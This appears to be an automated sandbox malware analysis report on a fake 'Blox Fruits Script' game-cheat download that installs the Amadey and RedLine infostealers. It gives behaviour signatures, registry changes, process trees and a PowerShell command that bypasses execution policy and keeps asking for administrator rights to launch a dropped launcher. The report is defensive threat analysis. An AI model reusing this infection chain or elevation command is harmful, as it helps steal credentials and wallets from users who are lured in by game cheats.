Malware Analysis Report

2025-08-06 00:06

Sample ID 240223-mcv1zsfb84
Target https://lavacht.com/Blox_Fruits_Script/index.php
Tags
amadey redline 11 discovery evasion infostealer persistence spyware stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

Threat Level: Known bad

The file https://lavacht.com/Blox_Fruits_Script/index.php was found to be: Known bad.

Malicious Activity Summary

amadey redline 11 discovery evasion infostealer persistence spyware stealer trojan

Amadey

RedLine payload

RedLine

Stops running service(s)

Drops file in Drivers directory

Creates new service(s)

Executes dropped EXE

Checks BIOS information in registry

Reads user/profile data of web browsers

Loads dropped DLL

Legitimate hosting services abused for malware hosting/C2

Checks installed software on the system

Accesses cryptocurrency files/wallets, possible credential harvesting

Drops file in System32 directory

Suspicious use of SetThreadContext

Launches sc.exe

Drops file in Windows directory

Enumerates physical storage devices

Uses Task Scheduler COM API

Suspicious use of WriteProcessMemory

Modifies Internet Explorer settings

Modifies data under HKEY_USERS

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: EnumeratesProcesses

Modifies Internet Explorer Phishing Filter

Suspicious behavior: GetForegroundWindowSpam

Uses Volume Shadow Copy service COM API

Suspicious use of FindShellTrayWindow

Uses Volume Shadow Copy WMI provider

Suspicious use of SetWindowsHookEx

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-02-23 10:19

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-02-23 10:19

Reported

2024-02-23 10:31

Platform

win7-20240220-en

Max time kernel

338s

Max time network

316s

Command Line

"C:\Program Files\Internet Explorer\iexplore.exe" https://lavacht.com/Blox_Fruits_Script/index.php

Signatures

Amadey

trojan amadey

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Creates new service(s)

persistence

Drops file in Drivers directory

Description Indicator Process Target
File created C:\Windows\system32\drivers\etc\hosts C:\Users\Admin\AppData\Roaming\services\2plugin2901 N/A
File created C:\Windows\system32\drivers\etc\hosts C:\ProgramData\SystemFiles\csrss.exe N/A

Stops running service(s)

evasion

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Roaming\services\2plugin2901 N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Roaming\services\2plugin2901 N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\ProgramData\SystemFiles\csrss.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\ProgramData\SystemFiles\csrss.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Windows\system32\conhost.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Windows\system32\conhost.exe N/A

Reads user/profile data of web browsers

spyware stealer

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Checks installed software on the system

discovery

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\system32\MRT.exe C:\ProgramData\SystemFiles\csrss.exe N/A
File opened for modification C:\Windows\system32\services.msc C:\Windows\system32\mmc.exe N/A
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\system32\MRT.exe C:\Users\Admin\AppData\Roaming\services\2plugin2901 N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\Dctooux.job C:\Users\Admin\AppData\Roaming\services\plugin0222 N/A
File created C:\Windows\wusa.lock C:\Windows\system32\wusa.exe N/A
File created C:\Windows\wusa.lock C:\Windows\system32\wusa.exe N/A

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A

Enumerates physical storage devices

Modifies Internet Explorer Phishing Filter

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\PhishingFilter C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\PhishingFilter\ClientSupported_MigrationTime = 40ad06af4266da01 C:\Program Files\Internet Explorer\iexplore.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{EBA17231-D235-11EE-9FEE-EA42E82B8F01} = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\DomainSuggestion C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "414845820" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\MINIE C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\Main\DownloadWindowPlacement = 2c0000000000000000000000ffffffffffffffffffffffffffffffff100100003d000000900300001d020000 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\IntelliForms C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\Toolbar C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\IETld\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\InternetRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\GPU C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\LowRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\PageSetup C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\MINIE\TabBandWidth = "500" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\system32\mmc.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\Zoom C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" C:\Program Files\Internet Explorer\iexplore.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 0048250d4366da01 C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\services\2plugin2901 N/A
N/A N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\services\2plugin2901 N/A
N/A N/A C:\Users\Admin\AppData\Roaming\services\2plugin2901 N/A
N/A N/A C:\Users\Admin\AppData\Roaming\services\2plugin2901 N/A
N/A N/A C:\Users\Admin\AppData\Roaming\services\2plugin2901 N/A
N/A N/A C:\Users\Admin\AppData\Roaming\services\2plugin2901 N/A
N/A N/A C:\Users\Admin\AppData\Roaming\services\2plugin2901 N/A
N/A N/A C:\ProgramData\SystemFiles\csrss.exe N/A
N/A N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\ProgramData\SystemFiles\csrss.exe N/A
N/A N/A C:\ProgramData\SystemFiles\csrss.exe N/A
N/A N/A C:\ProgramData\SystemFiles\csrss.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\services\3plugin0222 N/A
N/A N/A C:\Users\Admin\AppData\Roaming\services\3plugin0222 N/A
N/A N/A C:\Users\Admin\AppData\Roaming\services\3plugin0222 N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Windows\system32\mmc.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeRestorePrivilege N/A C:\Program Files\7-Zip\7zG.exe N/A
Token: 35 N/A C:\Program Files\7-Zip\7zG.exe N/A
Token: SeSecurityPrivilege N/A C:\Program Files\7-Zip\7zG.exe N/A
Token: SeSecurityPrivilege N/A C:\Program Files\7-Zip\7zG.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\services\3plugin0222 N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\system32\conhost.exe N/A
Token: 33 N/A C:\Windows\system32\mmc.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\system32\mmc.exe N/A
Token: 33 N/A C:\Windows\system32\mmc.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\system32\mmc.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2908 wrote to memory of 2952 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 2908 wrote to memory of 2952 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 2908 wrote to memory of 2952 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 2908 wrote to memory of 2952 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 1268 wrote to memory of 2144 N/A C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\I819HQXH\Blox_Fruits_Script\Launcher.exe C:\Users\Admin\AppData\Roaming\services\Launhcer.exe
PID 1268 wrote to memory of 2144 N/A C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\I819HQXH\Blox_Fruits_Script\Launcher.exe C:\Users\Admin\AppData\Roaming\services\Launhcer.exe
PID 1268 wrote to memory of 2144 N/A C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\I819HQXH\Blox_Fruits_Script\Launcher.exe C:\Users\Admin\AppData\Roaming\services\Launhcer.exe
PID 1268 wrote to memory of 2144 N/A C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\I819HQXH\Blox_Fruits_Script\Launcher.exe C:\Users\Admin\AppData\Roaming\services\Launhcer.exe
PID 1268 wrote to memory of 2144 N/A C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\I819HQXH\Blox_Fruits_Script\Launcher.exe C:\Users\Admin\AppData\Roaming\services\Launhcer.exe
PID 1268 wrote to memory of 2144 N/A C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\I819HQXH\Blox_Fruits_Script\Launcher.exe C:\Users\Admin\AppData\Roaming\services\Launhcer.exe
PID 1268 wrote to memory of 2144 N/A C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\I819HQXH\Blox_Fruits_Script\Launcher.exe C:\Users\Admin\AppData\Roaming\services\Launhcer.exe
PID 1268 wrote to memory of 2144 N/A C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\I819HQXH\Blox_Fruits_Script\Launcher.exe C:\Users\Admin\AppData\Roaming\services\Launhcer.exe
PID 1268 wrote to memory of 2144 N/A C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\I819HQXH\Blox_Fruits_Script\Launcher.exe C:\Users\Admin\AppData\Roaming\services\Launhcer.exe
PID 2144 wrote to memory of 2868 N/A C:\Users\Admin\AppData\Roaming\services\Launhcer.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2144 wrote to memory of 2868 N/A C:\Users\Admin\AppData\Roaming\services\Launhcer.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2144 wrote to memory of 2868 N/A C:\Users\Admin\AppData\Roaming\services\Launhcer.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2144 wrote to memory of 2868 N/A C:\Users\Admin\AppData\Roaming\services\Launhcer.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2144 wrote to memory of 2868 N/A C:\Users\Admin\AppData\Roaming\services\Launhcer.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2144 wrote to memory of 2868 N/A C:\Users\Admin\AppData\Roaming\services\Launhcer.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2144 wrote to memory of 2868 N/A C:\Users\Admin\AppData\Roaming\services\Launhcer.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2868 wrote to memory of 1952 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe
PID 2868 wrote to memory of 1952 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe
PID 2868 wrote to memory of 1952 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe
PID 2868 wrote to memory of 1952 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe
PID 2868 wrote to memory of 1952 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe
PID 2868 wrote to memory of 1952 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe
PID 2868 wrote to memory of 1952 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe
PID 2868 wrote to memory of 1952 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe
PID 2868 wrote to memory of 1952 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe
PID 1952 wrote to memory of 2420 N/A C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1952 wrote to memory of 2420 N/A C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1952 wrote to memory of 2420 N/A C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1952 wrote to memory of 2420 N/A C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1952 wrote to memory of 2420 N/A C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1952 wrote to memory of 2420 N/A C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1952 wrote to memory of 2420 N/A C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1952 wrote to memory of 2536 N/A C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe C:\Users\Admin\AppData\Roaming\services\wget.exe
PID 1952 wrote to memory of 2536 N/A C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe C:\Users\Admin\AppData\Roaming\services\wget.exe
PID 1952 wrote to memory of 2536 N/A C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe C:\Users\Admin\AppData\Roaming\services\wget.exe
PID 1952 wrote to memory of 2536 N/A C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe C:\Users\Admin\AppData\Roaming\services\wget.exe
PID 1952 wrote to memory of 2536 N/A C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe C:\Users\Admin\AppData\Roaming\services\wget.exe
PID 1952 wrote to memory of 2536 N/A C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe C:\Users\Admin\AppData\Roaming\services\wget.exe
PID 1952 wrote to memory of 2536 N/A C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe C:\Users\Admin\AppData\Roaming\services\wget.exe
PID 1952 wrote to memory of 1900 N/A C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe C:\Users\Admin\AppData\Roaming\services\winrar.exe
PID 1952 wrote to memory of 1900 N/A C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe C:\Users\Admin\AppData\Roaming\services\winrar.exe
PID 1952 wrote to memory of 1900 N/A C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe C:\Users\Admin\AppData\Roaming\services\winrar.exe
PID 1952 wrote to memory of 1900 N/A C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe C:\Users\Admin\AppData\Roaming\services\winrar.exe
PID 1952 wrote to memory of 1900 N/A C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe C:\Users\Admin\AppData\Roaming\services\winrar.exe
PID 1952 wrote to memory of 1900 N/A C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe C:\Users\Admin\AppData\Roaming\services\winrar.exe
PID 1952 wrote to memory of 1900 N/A C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe C:\Users\Admin\AppData\Roaming\services\winrar.exe
PID 2908 wrote to memory of 1656 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 2908 wrote to memory of 1656 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 2908 wrote to memory of 1656 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 2908 wrote to memory of 1656 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 1952 wrote to memory of 1532 N/A C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe C:\Users\Admin\AppData\Roaming\services\plugin0222
PID 1952 wrote to memory of 1532 N/A C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe C:\Users\Admin\AppData\Roaming\services\plugin0222
PID 1952 wrote to memory of 1532 N/A C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe C:\Users\Admin\AppData\Roaming\services\plugin0222
PID 1952 wrote to memory of 1532 N/A C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe C:\Users\Admin\AppData\Roaming\services\plugin0222
PID 1952 wrote to memory of 1532 N/A C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe C:\Users\Admin\AppData\Roaming\services\plugin0222
PID 1952 wrote to memory of 1532 N/A C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe C:\Users\Admin\AppData\Roaming\services\plugin0222
PID 1952 wrote to memory of 1532 N/A C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe C:\Users\Admin\AppData\Roaming\services\plugin0222
PID 1952 wrote to memory of 2796 N/A C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe C:\Users\Admin\AppData\Roaming\services\wget.exe
PID 1952 wrote to memory of 2796 N/A C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe C:\Users\Admin\AppData\Roaming\services\wget.exe
PID 1952 wrote to memory of 2796 N/A C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe C:\Users\Admin\AppData\Roaming\services\wget.exe

Uses Task Scheduler COM API

persistence

Uses Volume Shadow Copy WMI provider

ransomware

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" https://lavacht.com/Blox_Fruits_Script/index.php

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2908 CREDAT:275457 /prefetch:2

C:\Program Files\7-Zip\7zG.exe

"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\I819HQXH\Blox_Fruits_Script\" -spe -an -ai#7zMap9804:234:7zEvent21423

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\I819HQXH\Blox_Fruits_Script\Launcher.exe

"C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\I819HQXH\Blox_Fruits_Script\Launcher.exe"

C:\Users\Admin\AppData\Roaming\services\Launhcer.exe

"C:\Users\Admin\AppData\Roaming\services\Launhcer.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "$AdminRightsRequired = $true function Get-Win { while ($true) { # if ($AdminRightsRequired) { # try { Start-Process -FilePath '.\data\Launcher.exe' -Verb RunAs -Wait # break } catch { Write-Host 'Error 0xc0000906' } } else { # break } } } Get-Win"

C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe

